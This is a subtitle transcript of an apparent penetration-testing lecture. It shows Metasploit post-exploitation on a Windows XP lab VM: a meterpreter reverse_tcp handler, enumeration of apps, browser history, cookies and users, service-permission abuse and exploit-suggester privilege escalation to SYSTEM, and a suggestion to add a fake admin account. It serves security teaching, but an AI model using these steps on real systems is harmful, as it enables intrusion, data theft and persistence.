1 00:00:02,820 --> 00:00:05,280 So in this video, we're going to see some post exploitation.
2 00:00:05,460 --> 00:00:11,700 These are the post exploitation modules. After getting a session, you can use these modules for much more
3 00:00:11,700 --> 00:00:16,050 information and to get higher privileges, that is, privilege escalation.
4 00:00:16,770 --> 00:00:21,150 So first thing, I have created a Meterpreter payload.
5 00:00:21,450 --> 00:00:23,610 Uh, this is the payload.
6 00:00:23,970 --> 00:00:25,350 And you can see the name here.
7 00:00:25,350 --> 00:00:25,910 The payload.
8 00:00:26,100 --> 00:00:29,420 And it will connect back to this, uh, handler.
9 00:00:30,390 --> 00:00:34,890 We need to use this multi handler: use exploit/multi/handler.
10 00:00:37,720 --> 00:00:45,850 And if I show options, since I have already set these options... you need to set the right payload: set payload
11 00:00:49,810 --> 00:00:52,090 windows/meterpreter/
12 00:01:02,870 --> 00:01:04,070 reverse_tcp.
13 00:01:08,900 --> 00:01:14,660 So first, the options I have already set: the LHOST and the LPORT, that is, my Kali Linux IP address
14 00:01:14,660 --> 00:01:16,120 and port number.
15 00:01:16,880 --> 00:01:18,380 So let's go ahead and run this.
16 00:01:24,310 --> 00:01:26,980 So now you're going to execute this one.
17 00:01:29,150 --> 00:01:32,780 So there is a Meterpreter session opened. sessions -l.
18 00:01:36,790 --> 00:01:38,580 So, OK, let me background this one.
19 00:01:39,300 --> 00:01:40,360 sessions -l.
20 00:01:45,130 --> 00:01:53,570 So I have already, uh... I want to make sure that we got the session. Let me do this once more.
21 00:01:55,060 --> 00:02:01,670 sessions -k, so it's not a problem.
22 00:02:02,800 --> 00:02:10,800 So we have only one Meterpreter session, that is, uh, that is just a normal user session.
23 00:02:10,850 --> 00:02:11,230 Great.
24 00:02:11,470 --> 00:02:18,040 So we are going to check out some modules, uh, first, to check whether it is running on a virtual machine
25 00:02:18,040 --> 00:02:18,320 or not.
26 00:02:18,340 --> 00:02:21,170 That is, is my XP machine a virtual machine or not.
27 00:02:21,760 --> 00:02:28,520 We can also, uh, use the previous commands; I showed you those commands before, for other basic, basic commands.
28 00:02:29,050 --> 00:02:36,030 So let me, uh, setg. So let me first set the SESSION to 1.
29 00:02:36,250 --> 00:02:40,510 So these post exploitation modules will work with that session.
30 00:02:40,510 --> 00:02:45,370 Now, if I set this as a global, you don't need to worry about setting this SESSION to 1 each time.
31 00:02:45,370 --> 00:02:50,770 As a global. Now we are going to search for
32 00:02:52,480 --> 00:03:02,170 checkvm. So we have the Linux and the Windows one, so we are going to use this Windows one, use it, and display the
33 00:03:02,170 --> 00:03:02,850 options.
34 00:03:04,150 --> 00:03:06,500 So we already had this one set, right.
35 00:03:06,550 --> 00:03:10,390 Now we need to just run this module.
36 00:03:12,310 --> 00:03:18,920 So this is what the post exploitation module says: the XP is a virtual machine.
37 00:03:19,240 --> 00:03:21,460 So, OK, that's important.
38 00:03:21,680 --> 00:03:25,630 If you want to run some malware, you need to check
39 00:03:25,630 --> 00:03:29,910 whether the malware has VM escape capability or not.
40 00:03:29,920 --> 00:03:34,990 So you can check that, uh, because we know that it is a virtual machine.
41 00:03:36,680 --> 00:03:42,270 So now we can enumerate this Internet Explorer and the Chrome.
42 00:03:42,970 --> 00:03:48,460 So before that, let me, uh, display the installed applications.
43 00:03:49,090 --> 00:03:50,140 So search for
44 00:03:53,160 --> 00:04:00,060 enum_applications. enum_applications is there to enumerate all the applications or software that has been installed
45 00:04:00,060 --> 00:04:04,310 on this XP machine. Let me type use, you know, and show options.
46 00:04:05,610 --> 00:04:10:850 So basically the option for this post exploitation module is just the SESSION.
47 00:04:11,300 --> 00:04:12,720 Now that is set.
48 00:04:12,730 --> 00:04:13,620 Simply run this.
49 00:04:17,400 --> 00:04:26,190 And you can see all of these installed on this one: the recent updates, and we have Tools, and VNC
50 00:04:26,220 --> 00:04:28,950 software has been installed, and a Windows one.
51 00:04:29,070 --> 00:04:32,270 So you can take this exact version and look for exploits.
52 00:04:32,820 --> 00:04:34,650 So there are some security updates.
53 00:04:35,310 --> 00:04:42,270 And Python 2.7 has been installed, and the C++ redistributable has been installed, and Chrome, and
54 00:04:42,270 --> 00:04:44,010 another application, 2.0.
55 00:04:44,160 --> 00:04:52,080 So you can just Google for this particular software version to look for exploits. So basically, even
56 00:04:52,080 --> 00:04:53,600 if you run that, you will get the basics.
57 00:04:53,910 --> 00:05:03,390 But I'm just showing you the enumeration of these applications. Now you need to search ie, to get
58 00:05:03,390 --> 00:05:09,250 some information about the Internet Explorer: if there are already credentials, the used URLs.
59 00:05:09,540 --> 00:05:16,770 And so it's trying to retrieve the history and retrieving the cookies.
60 00:05:20,340 --> 00:05:28,050 So retrieving the history, it is located in this one. Let's copy this and say cat.
61 00:05:32,450 --> 00:05:35,160 So the modified date, and the URL.
62 00:05:35,180 --> 00:05:42,400 So there is this Google, Microsoft website, and also I opened... actually I did not open it, but I don't know, it's
63 00:05:42,400 --> 00:05:43,070 showing in this.
64 00:05:43,500 --> 00:05:44,720 It is showing in this history.
65 00:05:45,530 --> 00:05:47,440 So how do I know that this command works properly?
66 00:05:47,750 --> 00:05:48,410 Yes, it does.
67 00:05:48,410 --> 00:05:51,640 It showed me the, uh, history of the web browser.
68 00:05:52,100 --> 00:05:53,720 So there is enum_chrome.
69 00:05:53,720 --> 00:06:00,820 I think I do not use Chrome that much, so you can use this module and enumerate, you know, on
70 00:06:00,830 --> 00:06:01,490 the Chrome.
71 00:06:02,330 --> 00:06:07,820 So you can also check for SNMP strings, if there are any.
72 00:06:07,830 --> 00:06:09,760 So let's search for that.
73 00:06:10,220 --> 00:06:13,610 So I'm not sure, on my XP machine.
74 00:06:15,750 --> 00:06:20,960 Anyway, we will use that: use zero, and run.
75 00:06:24,050 --> 00:06:30,690 So SNMP is not installed there, so we cannot use that. So next we can enumerate the shares.
76 00:06:32,390 --> 00:06:33,020 Search.
77 00:06:43,960 --> 00:06:50,970 So after running this enum_shares, there are no shares that are being shown. And also, next,
78 00:06:51,280 --> 00:06:55,090 so now you can just use this enum_logged_on_users.
79 00:06:55,340 --> 00:06:57,910 So it tells you the users that are logged on.
80 00:07:00,460 --> 00:07:04,070 Or it will just, sometimes it will tell you the whole list.
81 00:07:07,710 --> 00:07:13,770 So I'm going to use this, zero, that is the post module, and run this.
82 00:07:16,190 --> 00:07:23,260 So the current users are: Nikkie, currently logged on, and recently logged on to this one: Nikkie,
83 00:07:23,840 --> 00:07:27,470 and Terminator. In the previous video, we were logged in as Terminator.
84 00:07:28,160 --> 00:07:31,430 So that, uh, user has also been shown.
85 00:07:33,460 --> 00:07:40,300 And the next one is, uh, GPP. Uh, this is group policy preferences. If there are any settings
86 00:07:40,300 --> 00:07:41,740 that are used,
87 00:07:41,740 --> 00:07:45,810 then we can get those settings, or exploit Windows with them.
88 00:07:46,330 --> 00:07:49,570 So this is a post module, a post exploitation module.
89 00:07:51,430 --> 00:07:52,430 And let's run this.
90 00:07:53,980 --> 00:08:03,070 So I did not, uh, these settings are not, uh, I did not, uh, put any settings in this
91 00:08:03,070 --> 00:08:11,140 local group policy, so it does not get any information. If you are in an Active Directory environment,
92 00:08:11,140 --> 00:08:12,790 then you get some information.
93 00:08:14,530 --> 00:08:21,160 And then there is this service permissions exploit, so let's see the service permissions.
94 00:08:25,330 --> 00:08:31,120 So this will check the service permissions, and it will enumerate, and if there are any permissions,
95 00:08:31,120 --> 00:08:36,850 uh, writable services, then it will upload the payload, it will create a service and get the
96 00:08:36,850 --> 00:08:37,950 reverse shell back to us.
97 00:08:42,170 --> 00:08:43,460 So let's use this one.
98 00:08:46,160 --> 00:08:57,020 So it's running on this. So, as you can see, it's also using the reverse_tcp payload, because if
99 00:08:57,410 --> 00:09:04,190 there is a misconfiguration, it will automatically upload this reverse_tcp and get a shell back
100 00:09:04,340 --> 00:09:07,260 to us. As you can see here, Meterpreter session opened.
101 00:09:08,000 --> 00:09:09,950 Now, this is a SYSTEM Meterpreter session.
102 00:09:10,160 --> 00:09:20,150 So if you go back and list the sessions, sessions -l, I will get the session identified as NT AUTHORITY\
103 00:09:20,150 --> 00:09:28,520 SYSTEM, so you can add a user, uh, a normal, a fake user, and add it to the administrators group.
104 00:09:28,670 --> 00:09:31,790 So this is the highly privileged session.
105 00:09:34,130 --> 00:09:42,710 So you can just get the shell using this shell command from the Meterpreter. You can enter the normal Windows
106 00:09:42,710 --> 00:09:45,420 commands in there. Let's kill this one.
107 00:09:47,390 --> 00:09:48,620 So the next one is local
108 00:09:48,620 --> 00:09:54,380 exploit suggester. Search for local_exploit.
109 00:09:56,420 --> 00:10:01,840 So we do use zero and display the options.
110 00:10:04,570 --> 00:10:06,200 So we need to just run this one.
111 00:10:06,220 --> 00:10:12,330 You can also set this description variable to true to see a detailed explanation.
112 00:10:13,030 --> 00:10:14,050 Let's run this.
113 00:10:16,170 --> 00:10:20,960 So it's collecting exploits for the target, and it may take some time.
114 00:10:54,490 --> 00:11:02,620 So it's saying that, uh, the checks are being done and it's trying these exploits: the service is
115 00:11:02,620 --> 00:11:03,950 running, but could not be validated.
116 00:11:04,840 --> 00:11:07,240 I can see the description here.
117 00:11:07,270 --> 00:11:09,260 The target appears to be vulnerable, for this,
118 00:11:09,550 --> 00:11:10,390 these two exploits.
119 00:11:10,690 --> 00:11:11,980 So let's copy this one.
120 00:11:14,160 --> 00:11:24,150 And let's say use, and paste this path here, and let's say show options. It's using this
121 00:11:24,150 --> 00:11:29,160 reverse_tcp, so if the exploit is successful, we will get the reverse shell back to us.
122 00:11:29,310 --> 00:11:30,270 So let's run this.
123 00:11:33,240 --> 00:11:43,950 So the exploit has been run and we got the shell. Let's see, uh, sessions -l, and
124 00:11:43,950 --> 00:11:50,850 we get the NT AUTHORITY\SYSTEM, so you can execute the, uh, commands there.
125 00:11:50,880 --> 00:11:58,200 So we can add, uh, a user, a fake user, and then add that user to that
126 00:11:59,040 --> 00:11:59,280 group.
127 00:12:00,240 --> 00:12:06,900 So this is all about these modules, where you can just simply run those and get the high privileges.
128 00:12:07,380 --> 00:12:12,440 You can get this just using these post exploitation modules.
129 00:12:13,710 --> 00:12:20,550 So we have already seen the post exploitation, but this is only about the privesc-related post exploitation,
130 00:12:20,550 --> 00:12:23,990 to get the, uh, to escalate our privs.
131 00:12:24,660 --> 00:12:28,430 So you just try this and you get used to it.
132 00:12:29,070 --> 00:12:34,870 So that's all for this video. I hope you understood this privilege escalation using Metasploit modules.